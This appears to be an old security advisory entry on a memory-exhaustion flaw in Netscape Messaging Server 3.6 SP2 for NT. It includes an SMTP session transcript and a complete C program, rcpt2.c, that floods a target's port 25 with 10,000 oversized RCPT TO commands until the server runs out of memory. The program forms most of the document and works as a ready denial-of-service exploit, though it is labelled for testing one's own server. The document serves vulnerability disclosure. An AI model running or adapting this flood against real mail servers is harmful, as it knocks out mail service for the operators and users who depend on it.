COMMAND
RCPT TO:
SYSTEMS AFFECTED
Netscape
PROBLEM
Nobuo Miwa found following:
220 victim.workgroup ESMTP server (Netscape Messaging Server -
Version 3.62) ready Thu, 28 Oct 1999 12:13:17 +0900
helo rcpt2
250 victim.workgroup
mail from : rcpt2
250 Sender <rcpt2> Ok
rcpt to: rcpt2@aaaaaaaaaaaaa............. 8000 bytes
250 Recipient <rcpt2@aaaaaaaaaaaa....
rcpt to: rcpt2@aaaaaaaaaaaaa............. 8000 bytes
250 Recipient <rcpt2@aaaaaaaaaaaa....
...
10,000 times
...
Then victim server's allocated memory size was increased up to no
more available memory and it's never been free after that. CPU
meter indicated 100% during receiving RCPT TO. Nobua tested this
on 128 MB RAM and has no more physical memory after 50 minutes.
Test was performed on Netscape Messaging Server 3.6 SP2 for NT.
Examination code(rcpt2.c) for YOUR server is following...
/***************************************************************
You can test "YOUR" Netscape Messaging Server 3.6SP2 for NT
whether vulnerable for too much RCPT TO or not.
by Nobuo Miwa, LAC Japan 28th Oct. 1999
http://www.lac.co.jp/security/
****************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define STR_HELO "HELO rcpt2\n"
#define STR_MAILFROM "MAIL FROM:rcpt2\n"
#define RCPT2_LENGTH 8000
#define RCPT2_NUMBER 10000
int openSocket(struct sockaddr_in *si, char *hostIPaddr)
{
int port=25, sd, rt ;
long li ;
struct hostent *he;
si->sin_addr.s_addr = inet_addr(hostIPaddr);
si->sin_family = AF_INET;
si->sin_port = htons (port);
sd = socket (si->sin_family, SOCK_STREAM, 0);
if (sd == -1) return (-1);
rt = connect(sd,(struct sockaddr *)si,sizeof(struct sockaddr_in));
if ( rt < 0 ) {
close(sd);
return(-1);
}
return(sd) ;
}
void sendRCPT2(int sd)
{
char rcptStr[RCPT2_LENGTH], tmpStr[RCPT2_LENGTH+80], strn[80];
int rt, i;
memset( tmpStr, 0, sizeof(tmpStr) ) ;
recv( sd, tmpStr, sizeof(tmpStr), 0 );
printf("%s",tmpStr);
printf("%s",STR_HELO);
send( sd, STR_HELO, strlen(STR_HELO), 0 );
memset( tmpStr, 0, sizeof(tmpStr) ) ;
rt = recv( sd, tmpStr, sizeof(tmpStr), 0 );
if ( rt>0 ) printf("%s",tmpStr);
printf("%s",STR_MAILFROM);
send(sd, STR_MAILFROM, strlen(STR_MAILFROM), 0);
memset( tmpStr, 0, sizeof(tmpStr) ) ;
rt = recv(sd, tmpStr, sizeof(tmpStr), 0);
if ( rt>0 ) printf("%s",tmpStr);
strcpy( rcptStr, "RCPT TO: rcpt2@" ) ;
while ( RCPT2_LENGTH-strlen(rcptStr)>10 )
strcat( rcptStr, "aaaaaaaaaa") ;
strcat( rcptStr, "\n" );
for ( i=0 ; i<RCPT2_NUMBER ; i++ ) {
printf("No.%d RCPT TO:rcpt2@aaa.. len %d\n",i,strlen(rcptStr));
send( sd, rcptStr, strlen(rcptStr), 0 );
rt = recv( sd, tmpStr, sizeof(tmpStr)-1, 0 );
strncpy( strn, tmpStr, 60 ) ;
if ( rt>0 ) printf("%s \n",strn);
}
return;
}
int main (int argc, char *argv[])
{
char hostIPaddr[80], *cc, *pfft;
int sd = 0;
struct sockaddr_in si;
printf("You can use ONLY for YOUR Messaging Server 3.6\n");
if (argc != 2) {
printf("Usage: %s IPaddress \n",argv[0]);
exit(1);
} else
strcpy (hostIPaddr, argv[1]);
sd = openSocket(&si,hostIPaddr);
if (sd < 1) {
printf("failed!\n");
exit(-1);
}
sendRCPT2( sd );
close (sd);
exit(0);
}
SOLUTION
Netscape said that they will release Messaging Server 4.15 for
NT on December and will fix this problem.